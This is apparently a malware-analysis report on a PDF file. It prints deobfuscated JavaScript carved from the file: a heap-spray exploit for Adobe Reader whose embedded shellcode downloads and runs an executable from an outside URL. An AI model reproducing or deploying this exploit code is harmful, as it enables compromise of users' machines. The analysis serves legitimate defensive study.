3scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc32scc32scc25scc36scc45scc25scc36scc35scc25scc37scc37scc25scc35scc30scc25scc36scc43scc25scc36scc31scc25scc37scc39scc25scc36scc35scc25scc37scc32scc25scc32scc32scc25scc33scc42scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc37scc36scc25scc37scc36scc25scc37scc36scc25scc33scc34scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc32scc32scc25scc36scc44scc25scc36scc35scc25scc36scc34scc25scc36scc39scc25scc36scc31scc25scc32scc32scc25scc33scc42scc25scc30scc41 endstream endobj xref 0 9 0000000000 65535 f 0000000015 00000 n 0000000100 00000 n 0000000413 00000 n 0000000148 00000 n 0000000207 00000 n 0000000313 00000 n 0000000730 00000 n 0000000475 00000 n trailer << /Root 1 0 R /Size 9 >> startxref 36221 %%EOF
`legacy_pdfkit_stage_000.js`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x8E2	1250 bytes
SHA-256: `577decb24013b7f7ff66c3e53b5ec187736f88090312b0b37d5e7d533d39bcd7`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var aPlugins = app.plugIns; for (var i=0; i < aPlugins.length; i++){ if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}} if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{} s=new Array(); var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6D2F%u7379%u7865%u6573%u2E78%u6F63%u2F6D%u656E%u2F77%u6F70%u7473%u702E%u7068%u653F%u383D%u2626"; var str="%u9090%u9090"; sh=unescape(sh);str=unescape(str); while(str.length <= 0x8000) {str+=str;} str=str.substr(0,0x8000 - sh.length); for(i=0;i<j;i++) {s[i]=str + sh;} var vvv = "p@111111111111111111111111 : yyyy111"; var vvv2 = "printd"; var vvv3 = "newPlayer"; var vvv4 = "media";

Open this report in the interactive analyzer, or submit your own file for analysis.